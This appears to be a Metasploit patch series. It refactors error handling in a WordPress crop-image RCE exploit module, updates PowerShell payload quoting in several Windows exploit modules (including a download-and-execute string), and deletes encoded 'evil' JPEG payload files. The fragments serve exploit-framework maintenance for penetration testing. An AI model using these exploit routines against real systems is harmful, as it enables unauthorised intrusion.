diff --git a/modules/exploits/multi/http/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb
index 7a638ce3b6..b43d01f652 100644
--- a/modules/exploits/multi/http/wp_crop_rce.rb
+++ b/modules/exploits/multi/http/wp_crop_rce.rb
@@ -101,9 +101,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'method'    => 'GET',
       'uri'       => uri
     )
-    if res && res.code == 200 && res.body && res.body.length > 0
-      res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first
-    end
+    fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && res.body.length > 0
+
+    theme = res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first
+    fail_with(Failure::NotFound, 'Failed to retrieve theme') unless theme
+
+    theme
   end
 
   def get_ajaxnonce(cookie)
@@ -122,9 +125,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'query[paged]' => '1'
       }
     )
-    if res && res.code == 200 && res.body && res.body.length > 0
-      res.body.scan(/"edit":"(\w+)"/).flatten.first
-    end
+    fail_with(Failure::NotFound, 'Unable to reach page to retrieve the ajax nonce') unless res && res.code == 200 && res.body && res.body.length > 0
+    a_nonce = res.body.scan(/"edit":"(\w+)"/).flatten.first
+    fail_with(Failure::NotFound, 'Unable to retrieve the ajax nonce') unless a_nonce
+
+    a_nonce
   end
 
   def upload_file(tmp_filename, img_name, wp_nonce, cookie)
@@ -183,10 +188,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'do' => 'save'
       }
     )
-    if res && res.code == 200 && res.body && res.body.length > 0
-      filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first
-      filename += '.jpg'
-    end
+    fail_with(Failure::NotFound, 'Unable to access page to retrieve filename') unless res && res.code == 200 && res.body && res.body.length > 0
+    filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first
+    fail_with(Failure::NotFound, 'Unable to retrieve file name') unless filename
+
+    filename << '.jpg'
   end
 
   def change_path(wpnonce2, image_id, filename, current_date, path, cookie)
@@ -234,6 +240,8 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code == 200 && res.body && res.body.length > 0
       wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first
       post_id = res.body.scan(/"post":{"id":(\w+),/).flatten.first
+      fail_with(Failure::NotFound, 'Unable to retrieve the second wpnonce and the post id') unless wpnonce2 && post_id
+
       post_title = Rex::Text.rand_text_alpha(10)
       uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
       res = send_request_cgi(
@@ -289,9 +297,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'       => uri1,
       'cookie'    => cookie
     )
+
     if res && res.code == 200 && res.body && res.body.length > 0
       post_nonce = res.body.scan(/post=#{post_id}&amp;action=trash&amp;_wpnonce=(\w+)/).flatten.first
+      fail_with(Failure::NotFound, 'Unable to retrieve post nonce') unless post_nonce
       uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
+
       res = send_request_cgi(
         'method'    => 'GET',
         'uri'       => uri2,
@@ -302,6 +313,7 @@ class MetasploitModule < Msf::Exploit::Remote
           '_wpnonce' => "#{post_nonce}"
         }
       )
+
       if res && res.code == 302
         res = send_request_cgi(
           'method'    => 'GET',
@@ -313,8 +325,11 @@ class MetasploitModule < Msf::Exploit::Remote
             '_wpnonce' => "#{post_nonce}"
           }
         )
+
         if res && res.code == 200 && res.body && res.body.length > 0
           nonce = res.body.scan(/post=#{post_id}&amp;action=delete&amp;_wpnonce=(\w+)/).flatten.first
+          fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce
+
           res = send_request_cgi(
             'method'    => 'GET',
             'uri'       => uri2,

From d185e8a018e1c19973c6baa8d021ff5434d1f7d1 Mon Sep 17 00:00:00 2001
From: Shelby Pace <shelby_pace@rapid7.com>
Date: Mon, 25 Mar 2019 14:54:46 -0500
Subject: [PATCH 08/16] indentation fix

---
 modules/exploits/multi/http/wp_crop_rce.rb | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/multi/http/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb
index b43d01f652..86a3eef3db 100644
--- a/modules/exploits/multi/http/wp_crop_rce.rb
+++ b/modules/exploits/multi/http/wp_crop_rce.rb
@@ -49,13 +49,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-  cookie = wordpress_login(username, password)
-  if cookie.nil?
-    store_valid_credential(user: username, private: password, proof: cookie)
-    return CheckCode::Safe
-  end
+    cookie = wordpress_login(username, password)
+    if cookie.nil?
+      store_valid_credential(user: username, private: password, proof: cookie)
+      return CheckCode::Safe
+    end
 
-  CheckCode::Appears
+    CheckCode::Appears
   end
 
   def username

From 496f270b307fabbb3bf06644beda8dce8e26e4e5 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Fri, 29 Mar 2019 18:14:56 -0500
Subject: [PATCH 09/16] Update use_single_quotes to wrap_double_quotes

---
 modules/exploits/windows/http/octopusdeploy_deploy.rb  | 2 +-
 modules/exploits/windows/local/registry_persistence.rb | 2 +-
 modules/exploits/windows/local/wmi.rb                  | 2 +-
 modules/exploits/windows/smb/smb_delivery.rb           | 2 +-
 4 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/http/octopusdeploy_deploy.rb b/modules/exploits/windows/http/octopusdeploy_deploy.rb
index 7e1c543cdf..ca0d6c87b4 100644
--- a/modules/exploits/windows/http/octopusdeploy_deploy.rb
+++ b/modules/exploits/windows/http/octopusdeploy_deploy.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # Generate the powershell payload
-    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, use_single_quotes: true)
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, wrap_double_quotes: true)
     step_name = datastore['STEPNAME'] || rand_text_alphanumeric(4 + rand(32 - 4))
     session = create_octopus_session unless datastore['APIKEY']
 
diff --git a/modules/exploits/windows/local/registry_persistence.rb b/modules/exploits/windows/local/registry_persistence.rb
index 6ec92d502d..bf55445944 100644
--- a/modules/exploits/windows/local/registry_persistence.rb
+++ b/modules/exploits/windows/local/registry_persistence.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def generate_payload_blob
     opts = {
-      use_single_quotes: true,
+      wrap_double_quotes: true,
       encode_final_payload: true,
     }
     blob = cmd_psh_payload(payload.encoded,payload_instance.arch.first, opts).split(' ')[-1]
diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb
index e013678ec6..60a00bbdf3 100644
--- a/modules/exploits/windows/local/wmi.rb
+++ b/modules/exploits/windows/local/wmi.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Local
     else
       psh_options = { :remove_comspec => true,
                       :encode_inner_payload => true,
-                      :use_single_quotes => true }
+                      :wrap_double_quotes => true }
     end
 
     psh = cmd_psh_payload(payload.encoded,
diff --git a/modules/exploits/windows/smb/smb_delivery.rb b/modules/exploits/windows/smb/smb_delivery.rb
index a0ca2ff380..b7878c996e 100644
--- a/modules/exploits/windows/smb/smb_delivery.rb
+++ b/modules/exploits/windows/smb/smb_delivery.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
       self.file_contents = cmd_psh_payload(  payload.encoded,
                                              payload_instance.arch.first,
                                              remove_comspec: true,
-                                             use_single_quotes: true)
+                                             wrap_double_quotes: true)
 
       ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
       download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)

From 3081b13a1f66165efed194d61f61bebf2e6ea1be Mon Sep 17 00:00:00 2001
From: wilfried <wilfried@debian>
Date: Tue, 2 Apr 2019 10:24:48 +0200
Subject: [PATCH 10/16] Adding payload in exploit code

---
 data/exploits/CVE-2019-8942/evil.jpg       | Bin 28541 -> 0 bytes
 data/exploits/CVE-2019-8942/evilshell.jpg  | Bin 11820 -> 0 bytes
 modules/exploits/multi/http/wp_crop_rce.rb |  39 ++++++++++++++++++---
 3 files changed, 34 insertions(+), 5 deletions(-)
 delete mode 100644 data/exploits/CVE-2019-8942/evil.jpg
 delete mode 100644 data/exploits/CVE-2019-8942/evilshell.jpg

diff --git a/data/exploits/CVE-2019-8942/evil.jpg b/data/exploits/CVE-2019-8942/evil.jpg
deleted file mode 100644
index ecafd2ffed9b731f628337d48678c5979c5ec923..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 28541
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
